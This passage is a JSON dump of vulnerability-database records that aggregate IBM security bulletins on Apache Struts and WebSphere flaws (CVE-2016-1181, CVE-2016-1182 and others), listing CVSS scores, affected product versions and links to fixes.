"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2022-08-19T21:04:31", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server that is shipped with IBM Intelligent Operations Center and related products (CVE-2016-1181 and CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2022-08-19T21:04:31", "id": "F5D5AAF38F45575DCEBF7AD5E9B3D25AA8678ED2972A091BF0082B881BDC74A4", "href": "https://www.ibm.com/support/pages/node/284011", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:59:43", "description": "## Summary\n\nStruts v2 vulnerabilities affet IBM Spectrum Control and Tivoli Storage Productivity Center. IBM Spectrum Control and Tivoli Storage Productivity Center have addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L) \n\n\n## Affected Products and Versions\n\n \nIBM Spectrum Control 5.2.8 through 5.2.10.1 \nTivoli Storage Productivity Center 5.2.0 through 5.2.7.1 \nTivoli Storage Productivity Center 5.1.0 through 5.1.1.10 \n \nThe versions listed above apply to all licensed offerings of IBM Spectrum Control and Tivoli Storage Productivity Center, including IBM SmartCloud Virtual Storage Center Storage Analytics Engine.\n\n## Remediation/Fixes\n\n**Note:** It is always recommended to have a current backup before applying any update procedure. \n \nApply the IBM Spectrum Control or Tivoli Storage Productivity Center fix maintenance as soon as practicable. (See [_Latest Downloads_](<http://www.ibm.com/support/docview.wss?uid=swg21320822>).) \n\n\n**Affected Version**| **APAR**| **Fixed Version**| **Availability** \n---|---|---|--- \n5.2.x| IT16542 | 5.2.11| August 2016 \n5.1.1.x| IT16542| 5.1.1.12| October 2016 \n \n \n\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2022-02-22T19:50:07", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Struts v2 affect IBM Spectrum Control (formerly Tivoli Storage Productivity Center) CVE-2016-1181, CVE-2016-1182", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182"], "modified": "2022-02-22T19:50:07", "id": "29036B6FEB00571E2FBC00E867150134E5DF9C08AD44F9670B7C8B0109F99570", "href": "https://www.ibm.com/support/pages/node/549139", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:46:26", "description": "## Summary\n\nWebsphere Application Server (WAS) Full profile is shipped as a component of Jazz for Service Management (JazzSM) and WAS has been affected by multiple security vulnerabilities.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-0359_](<https://vulners.com/cve/CVE-2016-0359>)** \nDESCRIPTION:** IBM WebSphere Application Server is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning, cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111929_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111929>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nJazz for Service Management version 1.1.0 - 1.1.3\n\n## Remediation/Fixes\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version| Affected Supporting Product Security Bulletin \n---|---|--- \nJazz for Service Management version 1.1.0 - 1.1.3| Websphere Application Server Full Profile 8.5.5| [Security Bulletin: HTTP Response Splitting in WebSphere Application Server (CVE-2016-0359)](<http://www-01.ibm.com/support/docview.wss?uid=swg21982526>) \n \n[Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) \n \n## Workarounds and Mitigations\n\nPlease refer to WAS iFix\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T15:26:47", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Jazz for Service Management (CVE-2016-0359, CVE-2016-1181, CVE-2016-1182)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0359", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T15:26:47", "id": "8AECCBE0CD244EF2C1818D4560A2112EBDDE17CF922BC7869D4367156735AD72", "href": "https://www.ibm.com/support/pages/node/285283", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:56:27", "description": "## Summary\n\nMultiple security vulnerabilities have been reported for Apache Struts that is used by IBM Business Process Manager and WebSphere Lombardi Edition.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-1181](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113852> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [CVE-2016-1182](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/113853> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n \n \n**CVEID:** [CVE-2015-0899](<https://vulners.com/cve/CVE-2015-0899>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the MultiPageValidator implementation. An attacker could exploit this vulnerability using a modified page parameter to bypass restrictions and launch further attacks on the system. This vulnerability also affects other products. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/101770> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n\n## Affected Products and Versions\n\n * * WebSphere Lombardi Edition V7.2.0.0 - V7.2.0.5\n * IBM Business Process Manager all editions V7.5.0.0 - V7.5.1.2\n * IBM Business Process Manager all editions V8.0.0.0 - V8.0.1.3\n * IBM Business Process Manager all editions V8.5.0.0 - V8.5.7.0 prior to cumulative fix 2016.09\n\n## Remediation/Fixes\n\nInstall IBM Business Process Manager interim fix JR56285 as appropriate for your current IBM Business Process Manager or WebSphere Lombardi Edition version. \n\n\n * [_IBM Business Process Manager Advanced_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Advanced&release=All&platform=All&function=aparId&apars=JR56285>)\n * [IBM Business Process Manager Standard](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Standard&release=All&platform=All&function=aparId&apars=JR56285>)\n * [IBM Business Process Manager Express](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Express&release=All&platform=All&function=aparId&apars=JR56285>)\n \nAs WebSphere Lombardi Edition and IBM Business Process Manager V7.5 are out of general support, customers with a support extension contract can contact IBM support to request the fix for download. \n \nIBM Business Process Manager and WebSphere Lombardi Edition build upon IBM WebSphere Application Server that also uses Apache Struts. Refer to the [Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>) for details on fixes for WebSphere Application Server. \nIBM Business Process Manager V8.5.7.0 cumulative fix 2016.09 includes IBM WebSphere Application Server V8.5.5.10, thus does not require additional fixes for this vulnerability. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-15T07:06:16", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities in Apache Struts might affect IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2016-1181, CVE-2016-1182, CVE-2015-0899)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0899", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-15T07:06:16", "id": "107B029DD56A2199A3A87E51461350D452A0422C3E3D25CE9E1B91F71C36131B", "href": "https://www.ibm.com/support/pages/node/552311", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:56:32", "description": "## Summary\n\nVulnerability in Apache Struts and Apache Commons FileUpload affects IBM WebSphere Service Registry and Repository (CVE-2016-1181, CVE-2016-1182, CVE-2016-3092) \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L)\n\n \n \n**CVEID:** [CVE-2016-3092](<https://vulners.com/cve/CVE-2016-3092>)** \nDESCRIPTION:** Apache Tomcat is vulnerable to a denial of service, caused by an error in the Apache Commons FileUpload component. By sending file upload requests, an attacker could exploit this vulnerability to cause the server to become unresponsive. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/114336> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n## Affected Products and Versions\n\n \nWebSphere Service Registry and Repository V8.5 \nWebSphere Service Registry and Repository V8.0 \n \nFor unsupported versions IBM recommends upgrading to a fixed, supported version of the product \n\n## Remediation/Fixes\n\nTo remediate CVE-2016-1181, CVE-2016-1182 and CVE-2016-3092 you need to apply fixes for both IBM WebSphere Application Server and IBM WebSphere Service Registry and Repository. \n \nFor** WebSphere Application Server** updates refer to this bulletin regarding CVE-2016-1181 and CVE-2016-1182 \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)](<http://www.ibm.com/support/docview.wss?uid=swg21985995>) \n \nFor CVE-2016-3092, please refer to this to this bulletin: \n[Security Bulletin: Apache Commons FileUpload Vulnerability affects WebSphere Application Server (CVE-2016-3092)](<http://www.ibm.com/support/docview.wss?uid=swg21987864>) \n \nFor **WebSphere Service Registry and Repository**, all three vulnerabilities have been fixed under APARs **IV87422 **and **IV87429** \n \nFixes containing IV87422 and IV87429 have been published and are available from Fix Central. \n \n**For WSRR V8.5**\n\n * Apply [**V8.5.6.0_IV79085_IV87422_IV87429_****IV89477**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=8.5.6.0-WS-WSRR-MultiOS-IFIV79085_IV87422_IV87429_IV89477>)** \n**\n**For WSRR V8.0**\n\n * Apply [](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=8.0.0.3-WS-WSRR-MultiOS-IFIV65487_IV79085>)[**V8.0.0.3_IV65487_IV79085_IV87422_IV87429_****IV89477**](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=8.0.0.3-WS-WSRR-MultiOS-IFIV65487_IV79085_IV87422_IV87429_IV89477>)** \n**\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-15T07:06:03", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Struts and Apache Commons FileUpload affects IBM WebSphere Service Registry and Repository (CVE-2016-1181, CVE-2016-1182, CVE-2016-3092)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182", "CVE-2016-3092"], "modified": "2018-06-15T07:06:03", "id": "55C6EB16408836E84C4255320770BC4F60934779CE325008D25B4951C20115C1", "href": "https://www.ibm.com/support/pages/node/548483", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-21T01:53:59", "description": "## Summary\n\nThere is an information disclosure vulnerability in IBM WebSphere Application Server Liberty for any users of the JAX-RS API. Apache Struts vulnerabilities affect WebSphere Application Server Administration Console. \n\n## Vulnerability Details\n\nPlease consult the security bulletins for vulnerability details and information about fixes: \n\n\n * [**Security Bulletin: Information disclosure in WebSphere Application Server Liberty (CVE-2016-2923)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21983700>)\n * * [**Security Bulletin: Vulnerabilities in Apache Struts affects IBM WebSphere Application Server (CVE-2016-1181 and CVE-2016-1182)**](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995>)\n[](<http://www-01.ibm.com/support/docview.wss?uid=swg21985995#com.dblue.docview.dwAnswers.textfield.addQuestion>)\n\n## Affected Products and Versions\n\nThese vulnerabilities affect the following versions and releases of IBM WebSphere Application Server that IBM WebSphere Application Server Patterns supports \n\n * Version 8.0\n * Version 8.5.5 Full Profile and Liberty\n * Version 9.0\n\n## Remediation/Fixes\n\nTo patch an existing PureApplication Virtual System Instance, apply the patch using the PureApplication Maintainence fix process. \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-15T07:05:58", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities affect IBM WebSphere Applciation Server bundled with IBM WebSphere Application Server Patterns and IBM WebSphere Application Server for Cloud", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1181", "CVE-2016-1182", "CVE-2016-2923"], "modified": "2018-06-15T07:05:58", "id": "6858032AD0022691AF88FEDCEF29BB4CEA50172EAD995CAB6463B91C16637C1C", "href": "https://www.ibm.com/support/pages/node/284161", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:33", "description": "## Summary\n\nIBM C\u00faram Social Program Management uses the Apache Struts Library. Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator; or Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance; or Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the MultiPageValidator implementation.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1182_](<https://vulners.com/cve/CVE-2016-1182>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \n_CVSS Base Score: 4.8 \nCVSS Temporal Score: See _[__https://exchange.xforce.ibmcloud.com/vulnerabilities/113853__](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>)_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L_) \n \n**CVEID:** [_CVE-2016-1181_](<https://vulners.com/cve/CVE-2016-1181>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \n_CVSS Base Score: 8.1 \nCVSS Temporal Score: See _[__https://exchange.xforce.ibmcloud.com/vulnerabilities/113852__](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>)_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H_) \n \n**CVEID:** [_CVE-2015-0899_](<https://vulners.com/cve/CVE-2015-0899>)** \nDESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the MultiPageValidator implementation. An attacker could exploit this vulnerability using a modified page parameter to bypass restrictions and launch further attacks on the system. This vulnerability also affects other products. \n_CVSS Base Score: 4.3 \nCVSS Temporal Score: See _[__https://exchange.xforce.ibmcloud.com/vulnerabilities/101770__](<https://exchange.xforce.ibmcloud.com/vulnerabilities/101770>)_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)_\n\n## Affected Products and Versions\n\nIBM C\u00faram Social Program Management 7.0.0.0 - 7.0.1.0 \nIBM C\u00faram Social Program Management 6.2.0.0 - 6.2.0.5 \nIBM C\u00faram Social Program Management 6.1.0.0 - 6.1.1.5 \nIBM C\u00faram Social Program Management 6.0.5.0 - 6.0.5.10\n\n## Remediation/Fixes\n\nProduct\n\n| VRMF| _Remediation/First Fix_ \n---|---|--- \nIBM C\u00faram Social Program Management| 7.0| Visit IBM Fix Central and upgrade to [_7.0.1.1_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=7.0.1.0&platform=All&function=all>) or a subsequent 7.0.1 release \nIBM C\u00faram Social Program Management| 6.2| Visit IBM Fix Central and upgrade to [_6.2.0.6_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.2.0.0&platform=All&function=all>) or a subsequent 6.2.0 release \nIBM C\u00faram Social Program Management| 6.1| Visit IBM Fix Central and upgrade to [_6.1.1.6_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.1.1.0&platform=All&function=all>) or a subsequent 6.1.1 release \nIBM C\u00faram Social Program Management| 6.0.5| Visit IBM Fix Central and upgrade to [_6.0.5.10 iFix2_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Smarter%20Cities&product=ibm/Other+software/Curam+Social+Program+Management&release=6.0.5.10&platform=All&function=all>) or a subsequent 6.0.5 release \n \n## Workarounds and Mitigations\n\nFor information on all other versions please contact C\u00faram Customer Support.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2018-06-17T13:09:41", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM C\u00faram Social Program Management (CVE-2016-1182, CVE-2016-1181, CVE-2015-0899)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0899", "CVE-2016-1181", "CVE-2016-1182"], "modified": "2018-06-17T13:09:41", "id": "B4BA991763253D738BCAA9AB61AE50E1AA4C20D6F3366D5551C3051C29FEADB2", "href": "https://www.ibm.com/support/pages/node/296843", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:46:25", "description": "## Summary\n\nEmbedded Websphere Application Server (eWAS) is shipped as a component of Tivoli Integrated Portal and eWAS has been affected by multiple security vulnerabilities.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-0359_](<https://vulners.com/cve/CVE-2016-0359>)** \nDESCRIPTION:** IBM WebSphere Application Server is vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning, cross-site scripting, and possibly obtain sensitive information. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111929_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111929>) for the 